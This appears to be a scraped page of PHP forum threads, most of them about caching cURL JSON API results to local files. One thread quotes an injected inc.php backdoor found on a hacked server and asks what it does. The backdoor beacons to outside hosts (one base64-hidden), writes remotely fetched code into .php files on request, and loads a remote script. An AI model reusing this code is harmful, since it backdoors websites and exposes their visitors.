I have spent a couple of hours reading up on this but as so yet I find no clear solutions....I am using WAMP to run as my Local server. I have a successful API call set up to return data.
I would like to store that data locally, thus reducing the number of API call being made.
For simplicity I have created a cache.json file in the same folder as my PHP scripts and when I run the process I can see the file has been accessed as the time stamp updates.
But the file remains empty.
Based on research I suspect the issue may come down to a permission issue; I have gone through the folders and files and unchecked read only etc.
Appreciate if someone could validate that my code is correct and if it is hopefully point me in the the direction of a solution.
many thanks
<?php
$url = 'https://restcountries.eu/rest/v2/name/'. $_REQUEST['country'];
$cache = __DIR__."/cache.json"; // make this file in same dir
$force_refresh = true; // dev
$refresh = 60; // once an min (set short time frame for testing)
// cache json results so to not over-query (api restrictions)
if ($force_refresh || ((time() - filectime($cache)) > ($refresh) || 0 == filesize($cache))) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL,$url);
$result=curl_exec($ch);
curl_close($ch);
$decode = json_decode($result,true);
$handle = fopen($cache, 'w');// or die('no fopen');
$json_cache = $decode;
fwrite($handle, $json_cache);
fclose($handle);
}
} else {
$json_cache = file_get_contents($cache); //locally
}
echo json_encode($json_cache, JSON_UNESCAPED_UNICODE);
?>
I managed to solve this by using file_put_contents(), not being an expert I do not understand why this works and the code above doesn't, but maybe this helps someone else.
adjusted code:
<?php
$url = 'https://restcountries.eu/rest/v2/name/'. $_REQUEST['country'];
$cache = __DIR__."/cache.json"; // make this file in same dir
$force_refresh = false; // dev
$refresh = 60; // once an min (short time frame for testing)
// cache json results so to not over-query (api restrictions)
if ($force_refresh || ((time() - filectime($cache)) > ($refresh) || 0 == filesize($cache))) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL,$url);
$result=curl_exec($ch);
curl_close($ch);
$decode = json_decode($result,true);
$handle = fopen($cache, 'w');// or die('no fopen');
$json_cache = $result;
file_put_contents($cache, $json_cache);
} else {
$json_cache = file_get_contents($cache); //locally
$decode = json_decode($json_cache,true);
}
echo json_encode($decode, JSON_UNESCAPED_UNICODE);
?>
Related
Someone uploaded this script on our server
https://github.com/mIcHyAmRaNe/wso-webshell
And we have found inc.php files in different directories on our server. The inc file has this code in it
<?php
error_reporting(0);
$s='http://a1b2cd.club/';
$host = str_replace('www.', '', #$_SERVER['HTTP_HOST']);
$x = $s.'l-'.base64_encode($host);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
echo $gitt;
if(isset($_GET['ksfg'])){
$f=fopen($_GET['ksfg'].'.php','a');
fwrite($f,file_get_contents($s.'s-'.$_GET['ksfg']));
fclose($f);
}
echo '<!DOCTYPE html!>';
?><?php
function GetIP(){
if(getenv("HTTP_CLIENT_IP")) {
$ip = getenv("HTTP_CLIENT_IP");
} elseif(getenv("HTTP_X_FORWARDED_FOR")) {
$ip = getenv("HTTP_X_FORWARDED_FOR");
if (strstr($ip, ',')) {
$tmp = explode (',', $ip);
$ip = trim($tmp[0]);
}
} else {
$ip = getenv("REMOTE_ADDR");
}
return $ip;
}
$x = base64_decode('aHR0cDovL2J5cjAwdC5jby9sLQ==').GetIP().'-'.base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
if(function_exists('curl_init'))
{
$ch = #curl_init(); curl_setopt($ch, CURLOPT_URL, $x); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $gitt = curl_exec($ch); curl_close($ch);
if($gitt == false){
#$gitt = file_get_contents($x);
}
}elseif(function_exists('file_get_contents')){
#$gitt = file_get_contents($x);
}
?>
</marquee><script src=http://expoilt.com/ccb.js></script>
No idea what this script has done to our server. As our server is hosted on so should we create the new instance? or should we suspend cpanel account from whm and create a new one and copy each and every file there? Please help me to understand what this could code actually do
if you get hacked try to change first all the passwords and recheck the code added by yourself (original version till 3-rd party got into your site ... maybe put site offline till checks ...). Possible to have a defect there, which allowed 3-rd party to upload whatever wanted on your site ! (this have to be fixed)
Regarding the added code, basically it's listing your site contends and ip-s(and some redirects ! - very dangerous for regular users). But what ever 3-rd party is going to do, have no clue ! (when get from outside admin privileges you could say that now it's acting as your_site owner).
<?php
if(isset($_POST["submit"]))
{
$adm=$_POST["admno"];
$phn=$_POST["phn1"];
include("model.php");
$db = new database;
$r=$db->register($adm);
while($row=mysql_fetch_array($r))
{
if($row["phn_no1"]==$phn || $row["phn_no2"]==$phn || $row["phn_no3"]==$phn)
{
$formatted = "".substr($phn,6,10)." ";
$password = $formatted + $adm;
echo $password;
$db->setpassword($adm,$password);
$pre = 'PREFIX';
$suf = '%20ThankYou';
$sms = $pre.$password.$suf;
session_start();
$ch = curl_init("http://www.perfectbulksms.in/Sendsmsapi.aspx? USERID=ID&PASSWORD=PASS&SENDERID=SID&TO=$phn&MESSAGE=$sms");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_AUTOREFERER, true);
$result = curl_exec($ch);
curl_close($ch);
header("Location:password.php?msg=new");
}
else
{
header("Location:register.php?msg=invalid");
}
}
}
?>
this code is working perfect on my local host .. but when i put it on server ... it takes lots of time but the code in curl command is not working it only refers to next page ... i checked that curl is enabled .. if i use only sms api without curl command it sends sms immidiately.... but i want to run both header and also want to hide my sms api.... is there any alternate of this ???
so I'm trying to figure out why does this PHP code takes too long to run to output the results.
for example this is my apitest.php and here is my PHP Code
<?php
function getRankedMatchHistory($summonerId,$serverName,$apiKey){
$k
$d;
$a;
$timeElapsed;
$gameType;
$championName;
$result;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://".$serverName.".api.pvp.net/api/lol/".$serverName."/v2.2/matchhistory/".$summonerId."?api_key=".$apiKey);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
$matchHistory = json_decode($response,true); // Is the Whole JSON Response saved at $matchHistory Now locally as a variable or is it requested everytime $matchHistory is invoked ?
for ($i = 9; $i >= 0; $i--){
$farm1 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["minionsKilled"];
$farm2 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralMinionsKilled"];
$farm3 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralminionsKilledTeamJungle"];
$farm4 = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["neutralminionsKilledEnemyJungle"];
$elapsedTime = $matchHistory["matches"][$i]["matchDuration"];
settype($elapsedTime, "integer");
$elapsedTime = floor($elapsedTime / 60);
$k = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["kills"];
$d = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["deaths"];
$a = $matchHistory["matches"][$i]["participants"]["0"]["stats"]["assists"];
$championIdTmp = $matchHistory["matches"][$i]["participants"]["0"]["championId"];
$championName = call_user_func('getChampionName', $championIdTmp); // calls another function to resolve championId into championName
$gameType = preg_replace('/[^A-Za-z0-9\-]/', ' ', $matchHistory["matches"][$i]["queueType"]);
$result = (($matchHistory["matches"][$i]["participants"]["0"]["stats"]["winner"]) == "true") ? "Victory" : "Defeat";
echo "<tr>"."<td>".$gameType."</td>"."<td>".$result."</td>"."<td>".$championName."</td>"."<td>".$k."/".$d."/".$a."</td>"."<td>".($farm1+$farm2+$farm3+$farm4)." in ". $elapsedTime. " minutes". "</td>"."</tr>";
}
}
?>
What I'd like to know is how to make the page output faster as it takes around
10~15 seconds to output the results which makes the browser thinks the website is dead like a 500 Internal error or something like it .
Here is a simple demonstration of how long it can take : Here
As you might have noticed , yes I'm using Riot API which is sending the response as a JSON encoded type.
Here is an example of the response that this function handles : Here
What I thought of was creating a temporarily file called temp.php at the start of the CURL function and saving the whole response there and then reading the variables from there so i can speed up the process and after reading the variables it deletes the temp.php that was created thus freeing up disk space. and increasing the speed.
But I have no idea how to do that in PHP Only.
By the way I'd like to tell you that i just started using PHP today so I'd prefer some explanation with the answers if possible .
Thanks for your precious time.
Try benchmarking like this:
// start the timer
$start_curl = microtime(true);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://".$serverName.".api.pvp.net/api/lol/".$serverName."/v2.2/matchhistory/".$summonerId."?api_key=".$apiKey);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// debugging
curl_setopt($ch, CURLOPT_VERBOSE, true);
// start another timer
$start = microtime(true);
$response = curl_exec($ch);
echo 'curl_exec() in: '.(microtime(true) - $start).' seconds<br><br>';
// start another timer
$start = microtime(true);
curl_close($ch);
echo 'curl_close() in: '.(microtime(true) - $start).' seconds<br><br>';
// how long did the entire CURL take?
echo 'CURLed in: '.(microtime(true) - $start_curl).' seconds<br><br>';
Got a slight bit of an issue. Been playing with the facebook and twitter API's and getting the JSON output of status search queries no problem, however I've read up further and realised that I could end up being "rate limited" as quoted from the documentation.
I was wondering is it easy to cache the JSON output each hour so that I can at least try and prevent this from happening? If so how is it done? As I tried a youtube video but that didn't really give much information only how to write the contents of a directory listing to a cache.php file, but it didn't really point out whether this can be done with JSON output and certainly didn't say how to use the time interval of 60 minutes or how to get the information then back out of the cache file.
Any help or code would be very much appreciated as there seems to be very little in tutorials on this sorta thing.
Here a simple function that adds caching to getting some URL contents:
function getJson($url) {
// cache files are created like cache/abcdef123456...
$cacheFile = 'cache' . DIRECTORY_SEPARATOR . md5($url);
if (file_exists($cacheFile)) {
$fh = fopen($cacheFile, 'r');
$size = filesize($cacheFile);
$cacheTime = trim(fgets($fh));
// if data was cached recently, return cached data
if ($cacheTime > strtotime('-60 minutes')) {
return fread($fh, $size);
}
// else delete cache file
fclose($fh);
unlink($cacheFile);
}
$json = /* get from Twitter as usual */;
$fh = fopen($cacheFile, 'w');
fwrite($fh, time() . "\n");
fwrite($fh, $json);
fclose($fh);
return $json;
}
It uses the URL to identify cache files, a repeated request to the identical URL will be read from the cache the next time. It writes the timestamp into the first line of the cache file, and cached data older than an hour is discarded. It's just a simple example and you'll probably want to customize it.
It's a good idea to use caching to avoid the rate limit.
Here's some example code that shows how I did it for Google+ data,
in some php code I wrote recently.
private function getCache($key) {
$cache_life = intval($this->instance['cache_life']); // minutes
if ($cache_life <= 0) return null;
// fully-qualified filename
$fqfname = $this->getCacheFileName($key);
if (file_exists($fqfname)) {
if (filemtime($fqfname) > (time() - 60 * $cache_life)) {
// The cache file is fresh.
$fresh = file_get_contents($fqfname);
$results = json_decode($fresh,true);
return $results;
}
else {
unlink($fqfname);
}
}
return null;
}
private function putCache($key, $results) {
$json = json_encode($results);
$fqfname = $this->getCacheFileName($key);
file_put_contents($fqfname, $json, LOCK_EX);
}
and to use it:
// $cacheKey is a value that is unique to the
// concatenation of all params. A string concatenation
// might work.
$results = $this->getCache($cacheKey);
if (!$results) {
// cache miss; must call out
$results = $this->getDataFromService(....);
$this->putCache($cacheKey, $results);
}
I know this post is old, but it show in google so for everyone looking, I made this simple one that curl a JSON url and cache it in a file that is in a specific folder, when json is requested again if 5min passed it will curl it if the 5min didnt pass yet, it will show it from file, it uses timestamp to track time and yea, enjoy
function ccurl($url,$id){
$path = "./private/cache/$id/";
$files = scandir($path);
$files = array_values(array_diff(scandir($path), array('.', '..')));
if(count($files) > 1){
foreach($files as $file){
unlink($path.$file);
$files = scandir($path);
$files = array_values(array_diff(scandir($path), array('.', '..')));
}
}
if(empty($files)){
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_TIMEOUT, 15);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_USERAGENT,
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
$response = curl_exec($c);
curl_close ($c);
$fp = file_put_contents($path.time().'.json', $response);
return $response;
}else {
if(time() - str_replace('.json', '', $files[0]) > 300){
unlink($path.$files[0]);
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_TIMEOUT, 15);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
curl_setopt($c, CURLOPT_USERAGENT,
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
$response = curl_exec($c);
curl_close ($c);
$fp = file_put_contents($path.time().'.json', $response);
return $response;
}else {
return file_get_contents($path. $files[0]);
}
}
}
for usage create a directory for all cached files, for me its /private/cache then create another directory inside for the request cache like x for example, and when calling the function it should be like htis
ccurl('json_url','x')
where x is the id, if u have question pls ask me ^_^ also enjoy (i might update it later so it doesn't use a directory for id
This is my code:
function get_remote_file_to_cache(){
$sites_array = array("http://www.php.net", "http://www.engadget.com", "http://www.google.se", "http://arstechnica.com", "http://wired.com");
$the_site= $sites_array[rand(0, 4)];
$curl = curl_init();
$fp = fopen("rr.txt", "w");
curl_setopt ($curl, CURLOPT_URL, $the_site);
curl_setopt($curl, CURLOPT_FILE, $fp);
curl_exec ($curl);
curl_close ($curl);
}
$cache_file = 'rr.txt';
$cache_life = '15'; //caching time, in seconds
$filemtime = #filemtime($cache_file);
if (!$filemtime or (time() - $filemtime >= $cache_life)){
ob_start();
echo file_get_contents($cache_file);
ob_get_flush();
echo " <br><br><h1>Writing to cache</h1>";
get_remote_file_to_cache();
}else{
echo "<h1>Reading from cache file:</h1><br> ";
ob_start();
echo file_get_contents($cache_file);
ob_get_flush();
}
Everything works as it should and no problems or surprises, and as you can see its pretty simple code but I am new to CURL and would just like to add one check to the code, but dont know how:
Is there anyway to check that the file fetched from the remote site is not a 404 (not found) page or such but is a status code 200 (successful) ?
So basically, only write to cache file if the fill is status code 200.
Thanks!
To get the status code from a cURL handle, use curl_getinfo after curl_exec:
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
But the cached file will be overwritten when
$fp = fopen("rr.txt", "w");
is called, regardless of the HTTP code, this means that to update the cache only when status is 200, you need to read the contents into memory, or write to a temporary file. Then finally write to the real file if the status is 200.
It is also a good idea to
touch('rr.txt');
before executing cURL, so that the next request that may come before the current operation finish will not also try to load the page to page too.
Try this after curl_exec
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);